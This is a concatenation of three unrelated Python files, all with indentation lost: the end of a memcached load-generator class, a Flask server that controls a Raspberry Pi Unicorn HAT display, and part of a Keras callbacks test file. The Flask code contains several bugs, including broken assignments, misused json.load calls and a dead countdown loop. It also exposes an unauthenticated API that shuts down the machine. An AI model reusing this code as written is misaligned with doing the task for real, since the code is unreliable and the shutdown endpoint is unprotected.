'doc-gen':0,
'prefix': prefix,
'socket-timeout': 60,
}
self.protocol = protocol
self.user = user
self.pswd = password
if protocol == 'membase-binary':
self.host_port = "{0}:{1}:{2}".format(master.ip, master.port, port)
elif protocol == 'memcached-binary':
self.host_port = "{0}:{1}:{1}".format(master.ip, port)
self.ctl = { 'run_ok': True }
def protocol_parse(self, protocol_in):
if protocol_in.find('://') >= 0:
protocol = \
'-'.join(((["membase"] + \
protocol_in.split("://"))[-2] + "-binary").split('-')[0:2])
host_port = ('@' + protocol_in.split("://")[-1]).split('@')[-1] + ":8091"
user, pswd = (('@' + protocol_in.split("://")[-1]).split('@')[-2] + ":").split(':')[0:2]
return protocol, host_port, user, pswd
def get_cfg(self):
return self.cfg
def load_data(self):
cur, start_time, end_time = mcsoda.run(self.cfg, {}, self.protocol, self.host_port, self.user, \
self.pswd, ctl=self.ctl, bucket=self.bucket)
return cur
def load_stop(self):
self.ctl['run_ok'] = False
|
server.py
|
#!sudo /usr/bin/env python
import os
import json
from jsmin import jsmin
import threading
import glob
from lib.unicorn_wrapper import UnicornWrapper
from time import sleep
from datetime import datetime
from gpiozero import CPUTemperature
from flask import Flask, jsonify, make_response, request, redirect, url_for, send_from_directory, render_template
from random import randint
# Initalize the Unicorn hat
unicorn = UnicornWrapper()
blinkThread = None
globalRed = 0
globalGreen = 0
globalBlue = 0
globalBrightness = 0
globalIcon = 'none'
globalShutdown= None
globalLastCalled = None
globalLastCalledApi = None
globalStatus = 'off'
#get the width and height of the hardware and set it to portrait if its not
width, height = unicorn.getShape()
class MyFlaskApp(Flask):
def run(self, host=None, port=None, debug=None, load_dotenv=True, **options):
if not self.debug or os.getenv('WERKZEUG_RUN_MAIN') == 'true':
with self.app_context():
startupRainbow()
super(MyFlaskApp, self).run(host=host, port=port, debug=debug, load_dotenv=load_dotenv, **options)
app = MyFlaskApp(__name__)
def validateJson(j):
try:
if j['size']['height'] != height:
return False, f"Height is wrong, expected: {height} got: {j['size']['height']}"
if j['size']['width'] != width:
return False, f"Height is wrong, expected: {width} got: {j['size']['width']}"
if len(j['pixels']) != height:
return False, "Parsing json found wrong number of rows"
for x in range(len(j['pixels'])):
if len(j['pixels'][x]) != width:
return False, f"Parsing json found wrong number of columns in row {x+1}"
return True, ''
except KeyError as err:
return False, f"An error occured, Missing JSON Key: {err}"
def setPixels(r, g, b, brightness = 0.5, jsonObj = None):
global globalIcon, globalBrightness, globalBlue, globalGreen, globalRed
globalRed = r
globalGreen = g
globalBlue = b
if brightness is not None:
globalBrightness = brightness
unicorn.setBrightness(brightness)
if jsonObj is not None:
globalIcon = jsonObj['name']
for x in range(width):
for y in range(height):
pixel = jsonObj['pixels'][y][x]
if pixel['red'] == -1:
red = r
else:
red = pixel['red']
if pixel['green'] == -1:
green = g
else:
green = pixel['green']
if pixel['blue'] == -1:
blue = b
else:
blue = pixel['blue']
unicorn.setPixel(x, y, red, green, blue)
else:
globalIcon="none"
unicorn.setColour(r,g,b)
def setDisplay(r, g, b, brightness = 0.5, speed = None, jsonObj = None):
global crntColors, globalIcon, globalBrightness, globalBlue, globalGreen, globalRed
globalBrightness = brightness
globalRed = -1
globalGreen = -1
globalRed = -1
globalIcon = "Rainbow"
setPixels(r, g, b, brightness, jsonObj)
unicorn.show()
if speed != None and speed != '' :
sleep(speed)
unicorn.clear()
crntT = threading.currentThread()
while getattr(crntT, "do_run", True) :
setPixels(r, g, b, brightness, jsonObj)
unicorn.show()
sleep(speed)
unicorn.clear()
unicorn.show()
sleep(speed)
def displayRainbow(step, brightness, speed, run = None, hue = None):
global crntColors
if hue == None:
hue = 0
if step is None:
step = 1
if speed is None:
speed is 0.2
if brightness is None:
brightness = 0.5
crntT = threading.currentThread()
while getattr(crntT, "do_run", True):
unicorn.setColour(RGB = unicorn.hsvIntToRGB(hue,100,100))
sleep(speed)
if hue >= 360:
hue = 0
if run is not None:
run = run - 1
if run <= 0:
switchOff()
else:
hue = hue + step
def halfBlink():
unicorn.show()
sleep(0.8)
unicorn.clear()
unicorn.show()
sleep(0.2)
def countDown(time):
crntT = threading.currentThread()
showTime = time - 12
while getattr(crntT, "do_run", True) and showTime > 0:
setPixels(255, 255, 0, 0.5, jsonObj = getIcon("arrow-down"))
unicorn.show()
sleep(1)
unicorn.clear()
unicorn.show()
sleep(1)
showTime = showTime - 2
i = 10
while getattr(crntT, "do_run", True) and i <= 0:
i = i - 1
obj = getIcon(f"numbers/{i}")
setPixels(255, 255, 0, 0.5, jsonObj=obj)
halfBlink()
setDisplay(255, 0, 0, 0.5)
halfBlink()
unicorn.clear()
unicorn.off()
def getIcon(icon):
try:
f = open(f"./icons/{unicorn.getType()}/{icon}.json", "r")
return json.loads(jsmin(f.read()))
except ValueError:
return False
except IOError:
return False
def switchOn():
global blinkThread, globalBlue, globalGreen, globalRed
rgb = unicorn.hsvIntToRGB(randint(0,360),100,100)
blinkThread = threading.Thread(target=setDisplay, args=(rgb[0], rgb[1], rgb[2]))
blinkThread.do_run = True
blinkThread.start()
def switchOff() :
global blinkThread, globalBlue, globalGreen, globalRed
globalRed = 0
globalGreen = 0
globalBlue = 0
if blinkThread != None :
blinkThread.do_run = False
if blinkThread.is_alive():
blinkThread.join()
unicorn.clear()
unicorn.off()
def shutdownPi() :
global blinkThread, globalShutdown, globalBlue, globalGreen, globalRed
globalShutdown = "Shutting Down!"
globalRed = None
globalBlue = None
globalGreen = None
blinkThread = threading.Thread(target=countDown, args=(60,))
blinkThread.do_run = True
blinkThread.start()
os.system("shutdown +2 'Shutdown trigger via API... Shutting down in 2 minute'")
def cancelShutdown() :
global blinkThread, globalShutdown, globalBlue, globalGreen, globalRed
globalShutdown = None
globalRed = None
globalBlue = None
globalGreen = None
os.system("shutdown -c 'Shutdown cancelled!... Carry on folks!'")
blinkThread.do_run = False
unicorn.clear()
unicorn.off()
switchOn()
def setTimestamp() :
global globalLastCalled
globalLastCalled = datetime.now()
# API Initialization
@app.route('/api/on', methods=['GET'])
def apiOn() :
global globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/on'
switchOff()
switchOn()
setTimestamp()
return jsonify({})
@app.route('/api/off', methods=['GET'])
def apiOff() :
global crntColors, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/off'
crntColors = None
switchOff()
setTimestamp()
return jsonify({})
@app.route('/api/shutdown', methods=['DELETE'])
def turnOff() :
global globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/shutdown'
setTimestamp()
switchOff()
shutdownPi()
return make_response(jsonify({"message": "Shutdown Triggered!"}))
@app.route('/api/countdown', methods=['GET'])
def apiCountDown():
global blinkThread, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
blinkThread = threading.Thread(target=countDown, args=(14,))
blinkThread.do_run = True
blinkThread.start()
return make_response(jsonify({"message": "14 second countdown started"}))
@app.route('/api/icons', methods=['GET'])
def getIcons():
path = f"./icons/{unicorn.getType()}/"
files = glob.glob(f"{path}**/*.json", recursive=True)
icons = []
for file in files:
icons.append(file.replace(path, "").split('.')[0])
return make_response(jsonify({"unicorn": unicorn.getType(), "height": height, "width": width, "icons": icons}))
# This method is added for homekit compatibility
@app.route('/api/display/hsv', methods=['POST'])
def apiDisplayHsv():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/display/hsv'
switchOff()
content = json.load(jsmin(request.get_data()))
hue = content.get('hue', 0)
saturation = content.get('saturation', 0)
value = content.get('value', 0)
rgb = unicorn.hsvIntToRGB(hue, saturation, value)
brightness = content.get('brightness', 0.5)
speed = content.get('speed', '')
blinkThread = threading.Thread(target=setDisplay, args=(rgb[0], rgb[1], rgb[2], brightness, speed))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
@app.route('/api/display/rainbow', methods=['POST'])
def apiDisplayRainbow():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
switchOff()
content = json.load(jsmin(request.get_data()))
hue = content.get('hue', 0)
step = content.get('step', None)
brightness = content.get('brightness', None)
speed = content.get('speed', None)
blinkThread = threading.Thread(target=displayRainbow, args=(step, brightness, speed, None, hue))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
# This is the original method for setting the display
@app.route('/api/display/rgb', methods=['POST'])
def apiDisplayRgb():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/display/rgb'
switchOff()
content = json.load(jsmin(request.get_data()))
r = content.get('red', '')
g = content.get('green', '')
b = content.get('blue', '')
brightness = content.get('brightness', None)
speed = content.get('speed', None)
blinkThread = threading.Thread(target=setDisplay, args=(r, g, b, brightness, speed))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
# Added this to allow for simple icons/pixel art
@app.route('/api/display/icon', methods=['POST'])
def apiDisplayIcon():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/display/icon'
switchOff()
content = json.load(jsmin(request.get_data()))
icon = content.get('icon', None)
red = content.get('red', '')
green = content.get('green', '')
blue = content.get('blue', '')
brightness = content.get('brightness', None)
speed = content.get('speed', None)
jsonObj = getIcon(icon)
if not jsonObj:
return make_response(jsonify({'error': 'Invalid Icon name', 'message': f"No icon file matches ./icons/{unicorn.getType()}/{icon}.json... Maybe think about creating it?" }), 500)
blinkThread = threading.Thread(target=setDisplay, args=(red, green, blue, brightness, speed, jsonObj))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
# This allows for development of new icons so you
# can test the raw JSON before you create an icon
# json file.
@app.route('/api/display/json', methods=['POST'])
def apiDisplayJson():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/display/json'
switchOff()
content = json.load(jsmin(request.get_data()))
jsonObj = jsmin(content.get('json', ''))
valid, message = validateJson(jsonObj)
if not valid:
return make_response(jsonify({'error': 'Invalid Json', 'message': message}), 500)
red = content.get('red', '')
green = content.get('green', '')
blue = content.get('blue', '')
brightness = content.get('brightness', None)
speed = content.get('speed', None)
blinkThread = threading.Thread(target=setDisplay, args=( red, green, blue, brightness, speed, jsonObj))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
@app.route('/api/status', methods=['GET'])
def apiStatus():
global globalBlue, globalGreen, globalRed, globalBrightness, globalIcon, \
globalLastCalled, globalLastCalledApi, width, height, unicorn
cpu = CPUTemperature()
return jsonify({ 'red': globalRed, 'green': globalGreen,
'blue': globalBlue, 'brightness': globalBrightness,
'icon': globalIcon, 'lastCalled': globalLastCalled,
'cpuTemp': cpu.temperature, 'lastCalledApi': globalLastCalledApi,
'height': height, 'width': width, 'unicorn': unicorn.getType() })
#Non Api routes for the frontend
@app.route('/', methods=['GET'])
def root():
global globalShutdown, globalLastCalledApi, globalBlue, globalGreen, globalRed, globalStatus
return render_template("index.html", status=globalStatus, r=globalRed, g=globalGreen, b=globalBlue, shutdown=globalShutdown)
@app.route('/off', methods=['GET'])
def offCall():
global globalShutdown, globalLastCalledApi, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Off'
globalStatus='off'
switchOff()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/on', methods=['GET'])
def onCall():
global globalShutdown, globalLastCalledApi, globalBlue, globalGreen, globalRed, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: On'
globalStatus='on'
switchOff()
switchOn()
return render_template("index.html", status=globalStatus, r=globalRed, g=globalGreen, b=globalBlue, shutdown=globalShutdown)
@app.route('/busy', methods=['POST'])
def busyCall():
global globalShutdown, globalLastCalledApi, blinkThread, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Busy'
globalStatus='busy'
switchOff()
jsonObj = getIcon("dnd")
blinkThread = threading.Thread(target=setDisplay, args=(255, 0, 0, 0.7, 1, jsonObj))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/available', methods=['POST'])
def availableCall():
global globalShutdown, globalLastCalledApi, blinkThread, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Available'
globalStatus="available"
switchOff()
blinkThread = threading.Thread(target=setDisplay, args=(0, 255, 0, 0.5))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/away', methods=['POST'])
def awayCall():
global globalShutdown, globalLastCalledApi, blinkThread, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Away'
globalStatus='away'
switchOff()
blinkThread = threading.Thread(target=setDisplay, args=(255, 255, 0, 0.5))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/rainbow', methods=['POST'])
def rainbowCall():
global blinkThread, globalLastCalledApi, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Rainbow'
globalStatus='rainbow'
switchOff()
blinkThread = threading.Thread(target=displayRainbow, args=(1, 0.5, 0.2, None, 0))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/shutdown', methods=['POST'])
def shutdownCall():
global globalShutdown, globalLastCalledApi, globalBlue, globalGreen, globalRed, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Shutdown'
globalStatus='shutdown'
switchOff()
shutdownPi()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/cancel-shutdown', methods=['POST'])
def cancelShutdownCall():
global globalShutdown, globalLastCalledApi, globalBlue, globalGreen, globalRed, globalStatus
globalLastCalledApi='Frontend: Cancel Shutdown'
globalStatus='off'
switchOff()
cancelShutdown()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
def startupRainbow():
global blinkThread, globalStatus
globalStatus = 'off'
blinkThread = threading.Thread(target=displayRainbow, args=(10, 1, 0.1, 1))
blinkThread.do_run = True
blinkThread.start()
blinkThread.join()
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
import tensorflow.compat.v2 as tf
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from unittest import mock
from absl.testing import parameterized
import numpy as np
import keras
from keras import keras_parameterized
from keras import testing_utils
from keras.callbacks import BackupAndRestore
from keras.callbacks import BackupAndRestoreExperimental
from keras.engine import sequential
from keras.layers import Activation
from keras.layers import Dense
from keras.optimizer_v2 import gradient_descent
from keras.optimizer_v2 import learning_rate_schedule
from keras.utils import io_utils
from keras.utils import np_utils
from tensorflow.python.platform import tf_logging as logging
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
CALLBACK_HOOKS = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
for method_name in CALLBACK_HOOKS:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
class CallAllHooks(keras.callbacks.Callback):
"""A callback that calls self._run for all hooks"""
def __init__(self):
for method_name in CALLBACK_HOOKS:
setattr(self, method_name, self._run)
def _run(self, *args, logs=None):
raise NotImplementedError
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
tf.compat.v1.train.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
if not tf.executing_eagerly():
self.skipTest('Behavior changed in v2.')
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
steps_per_epoch=5,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None, additional_metrics=None):
additional_metrics = additional_metrics or []
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')] +
additional_metrics,
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_with_stateful_metrics(self):
class AddAllOnes(keras.metrics.Metric):
"""A simple metric that adds all the one's in `y_true`."""
def __init__(self, name='add_all_ones', **kwargs):
super(AddAllOnes, self).__init__(name=name, **kwargs)
self.total = self.add_weight(name='total', initializer='zeros')
def update_state(self, y_true, y_pred, sample_weight=None):
self.total.assign_add(
tf.cast(tf.reduce_sum(y_true), dtype=tf.float32))
def result(self):
return self.total
x_train = np.array([[0, 1, 0, 1, 0, 1, 0, 1]] * 8).astype(float)
y_train = np.array([[1, 0], [0, 0], [1, 1], [1, 0], [0, 1], [1, 0], [1, 0],
[0, 0]])
# There are 7 ones in total in `y_train` after two batches.
expected_log = r'(.*- loss:.*- my_acc:.*- add_all_ones: 7.0000)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.fit(x_train, y_train, verbose=1, batch_size=4, shuffle=False)
self.assertRegex(printed.contents(), expected_log)
# When not executing eagerly, `model.evaluate` does not have the metrics
# results printed.
if tf.executing_eagerly():
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.evaluate(x_train, y_train, verbose=1, batch_size=4)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_all_keras_modes
def test_trivial_backup_restore(self):
if testing_utils.should_run_eagerly():
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=0, callbacks=[cbk])
def test_backup_restore_train_counter(self):
if not tf.compat.v1.executing_eagerly():
self.skipTest('BackupAndRestore only available when execution is enabled')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
logging.info(f'counter: {model._train_counter}')
if epoch == 5 or epoch == 12:
raise RuntimeError('Interruption')
log_dir = self.get_temp_dir()
# The following asserts that the train counter is fault tolerant.
self.assertEqual(model._train_counter.numpy(), 0)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 6)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 13)
def _test_backup_and_restore_callback_with(self, cls):
if not tf.compat.v1.executing_eagerly():
self.skipTest('BackupAndRestore only available when execution is enabled')
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
if epoch == 15:
raise RuntimeError('Interruption')
model = keras.Sequential([keras.layers.Dense(10)])
optimizer = gradient_descent.SGD()
model.compile(optimizer, loss='mse')
x = tf.random.uniform((24, 10))
y = tf.random.uniform((24,))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).repeat().batch(2)
backup_callback = cls(backup_dir=self.get_temp_dir())
try:
model.fit(
dataset,
epochs=20,
steps_per_epoch=5,
callbacks=[backup_callback, InterruptingCallback()])
except RuntimeError:
logging.warning('***Handling interruption***')
# This continues at the epoch where it left off.
model.fit(
dataset, epochs=20, steps_per_epoch=5, callbacks=[backup_callback])
def test_experimental_backup_and_restore(self):
"""Ensure the legacy endpoint of `BackupAndRestore` gives warning."""
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
self._test_backup_and_restore_callback_with(BackupAndRestoreExperimental)
warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` '
'endpoint is deprecated')
self.assertIn(warning_msg, '\n'.join(warning_messages))
warning_msg = ('***Handling interruption***')
self.assertIn(warning_msg, '\n'.join(warning_messages))
def test_backup_and_restore(self):
"""Ensure the public endpoint of `BackupAndRestore` is working."""
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
self._test_backup_and_restore_callback_with(BackupAndRestore)
warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` '
'endpoint is deprecated')
self.assertNotIn(warning_msg, '\n'.join(warning_messages))
warning_msg = ('***Handling interruption***')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@keras_parameterized.run_all_keras_modes
def test_callback_warning(self):
class SleepCallback(keras.callbacks.Callback):
def on_train_batch_end(self, batch, logs=None):
time.sleep(0.1)
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1,
callbacks=[SleepCallback()])
warning_msg = ('Callback method `on_train_batch_end` is slow compared '
'to the batch time')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@keras_parameterized.run_all_keras_modes
def test_default_callbacks_no_warning(self):
# Test that without the callback no warning is raised
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1)
self.assertListEqual(warning_messages, [])
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((50, 3))
y = tf.zeros((50, 2))
training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
